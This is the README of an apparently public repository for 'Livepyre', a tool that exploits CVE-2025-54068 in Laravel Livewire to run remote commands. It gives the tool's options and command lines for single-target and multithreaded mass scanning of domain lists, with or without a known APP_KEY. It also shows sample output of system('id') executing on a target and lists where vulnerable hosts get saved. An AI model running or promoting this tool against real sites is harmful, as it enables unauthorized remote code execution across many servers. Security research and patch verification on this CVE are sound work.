Skip to content

willygoid/Livepyre

BranchesTags
 
 

Repository files navigation

Livepyre

Logo

A tool designed to exploit CVE-2025-54068 and Remote Command Execution if the APP_KEY of the Livewire project is known.

Authors of the tool: @_remsio_ @_Worty.

Features

  • ✅ Single target scanning
  • Mass scanning from domain list
  • Smart vulnerability detection (distinguishes confirmed vs potential vulnerabilities)
  • Real-time result saving (no need to wait for all scans to complete)
  • Multi-threaded scanning for maximum speed
  • URL normalization (supports various formats: domain.com, www.domain.com, http://domain.com, https://domain.com/)
  • Version tracking (detects and logs Livewire version)
  • ✅ Progress tracking and statistics

Help

$ ./Livepyre.py -h
usage: Livepyre.py [-h] (-u URL | -l LIST) [-f FUNCTION] [-p PARAM] [-H HEADERS] [-P PROXY] 
                   [-a APP_KEY] [-d] [-F] [-c] [-t THREADS] [-o OUTPUT] [-n NOT_VULN] 
                   [-pv POTENTIAL_VULN]

Livewire exploit tool

options:
  -h, --help            show this help message and exit
  -u, --url URL         Single target URL
  -l, --list LIST       File containing list of domains/URLs (for without APP_KEY only)
  -f, --function FUNCTION
                        Function to execute (default: system)
  -p, --param PARAM     Param for function (default: id)
  -H, --headers HEADERS
                        Headers to add to the request (default None)
  -P, --proxy PROXY     Proxy URL for requests
  -a, --app-key APP_KEY
                        APP_KEY to sign snapshot
  -d, --debug           Enable debug output
  -F, --force           Force exploit even if version does not seems to be vulnerable
  -c, --check           Only check if the remote target is vulnerable
  -t, --threads THREADS Number of threads for mass scanning (default: 5)
  -o, --output OUTPUT   Output file for vulnerable targets (default: vulnerable.txt)
  -n, --not-vuln NOT_VULN
                        Output file for not vulnerable targets (default: not_vulnerable.txt)
  -pv, --potential-vuln POTENTIAL_VULN
                        Output file for potential vulnerable targets (default: potensial_vuln.txt)

Usage

Single Target

$ ./Livepyre.py -u https://target.com/

Mass Scanning

# Scan from domains.txt file with 10 threads
$ ./Livepyre.py -l domains.txt -t 10

# Scan with custom output files
$ ./Livepyre.py -l domains.txt -o vuln_results.txt -n safe_results.txt

# Scan with APP_KEY
$ ./Livepyre.py -l domains.txt -a 'base64:CGhMqYXFMzbOe048WS6a0iG8f6bBcTLVbP36bqqrvuA='

# Scan with debug mode
$ ./Livepyre.py -l domains.txt -d

# Scan with custom potential vulnerability file
$ ./Livepyre.py -l domains.txt -pv my_potential_vulns.txt

Note: Results are automatically saved in the results/ folder:

  • results/vulnerable.txt - Confirmed vulnerable targets (exploit succeeded)
  • results/potensial_vuln.txt - Potentially vulnerable targets (version is vulnerable but exploit failed)
  • results/not_vulnerable.txt - Not vulnerable targets

The results/ folder is created automatically if it doesn't exist.

Result Categories

The scanner now provides three-tier classification:

  1. Confirmed Vulnerable: Version is vulnerable AND exploit succeeded

    • Saved to: results/vulnerable.txt
    • Action: Immediate attention required

  2. Potentially Vulnerable: Version is vulnerable BUT exploit failed

    • Saved to: results/potensial_vuln.txt
    • Includes detected Livewire version
    • Action: Manual verification recommended

  3. Not Vulnerable: Version is not vulnerable OR not running Livewire

    • Saved to: results/not_vulnerable.txt
    • Action: No further action needed

Domain File Format

The domains.txt file can contain various formats:

example.com
www.example.com
http://example.com
https://example.com/
https://example.com/path

Note: Results will be saved in real-time, so you can monitor the output files while scanning is in progress!

Examples

Single Target

# Without the APP_KEY and if an object type is in snapshot
$ ./Livepyre.py -u http://livewire.local/counter
[INFO] The remove livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit without APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Found 2 possible param(s).
[INFO] Checking for param(s) with object type to avoid bruteforce.
[INFO] test is typed as an object, triggering RCE.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)

# Without the APP_KEY with bruteforce if there isn't any object type in snapshot
$ ./Livepyre.py -u http://livewire.local/counter
[INFO] The remove livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit without APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Found 1 possible param(s).
[INFO] Checking for param(s) with object type to avoid bruteforce.
[WARNING] No param with direct object type was found, attempting bruteforce.
[INFO] Trying to gain RCE with param count.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)

# With the APP_KEY
$ ./Livepyre.py -u http://livewire.local/counter -a 'base64:CGhMqYXFMzbOe048WS6a0iG8f6bBcTLVbP36bqqrvuA='
[INFO] The remove livewire version is v3.6.2, the target is vulnerable.
[INFO] Found snapshot(s). Running exploit.
[INFO] Running exploit with APP_KEY.
[INFO] Found 1 snapshot(s) available.
[INFO] Sending payload system('id') to livewire.
[INFO] Payload works, output:
uid=1337(sail) gid=33(www-data) groups=33(www-data)

Mass Scanning

$ ./Livepyre.py -l domains.txt -t 10
[INFO] Starting mass scan for 100 domains
[INFO] Using 10 threads
[INFO] Vulnerable results will be saved to: results/vulnerable.txt
[INFO] Potential vulnerable results will be saved to: results/potensial_vuln.txt
[INFO] Not vulnerable results will be saved to: results/not_vulnerable.txt

[PROGRESS] Scanned: 45/100 | Vuln: 3 | Potential: 5 | Not Vuln: 34 | Errors: 3

============================================================
[SCAN COMPLETED]
Total Scanned: 100/100
Vulnerable: 5
Potential Vulnerable: 8 (version vuln but exploit failed)
Not Vulnerable: 84
Errors: 3

Results saved to:
  - Vulnerable: results/vulnerable.txt
  - Potential Vulnerable: results/potensial_vuln.txt
  - Not Vulnerable: results/not_vulnerable.txt
============================================================

Example output in results/potensial_vuln.txt:

# Scan started: 2026-01-23 10:12:34
# Total targets: 100

[2026-01-23 10:13:15] https://example1.com - Version: v3.5.0
[2026-01-23 10:13:20] https://example2.com - Version: v3.4.12
[2026-01-23 10:14:05] https://example3.com - Version: v3.6.1

License

This project is licensed under the MIT License - see the LICENSE file for details.

About

A tool designed to exploit CVE-2025-54068 and Remote Command Execution if the APP_KEY of the Livewire project is known.

Resources

Readme

License

MIT license
Activity

Stars

2 stars

Watchers

0 watching

Forks

2 forks
Report repository

Releases

No releases published

Packages

 
 
 

Contributors

Languages

  • Python 100.0%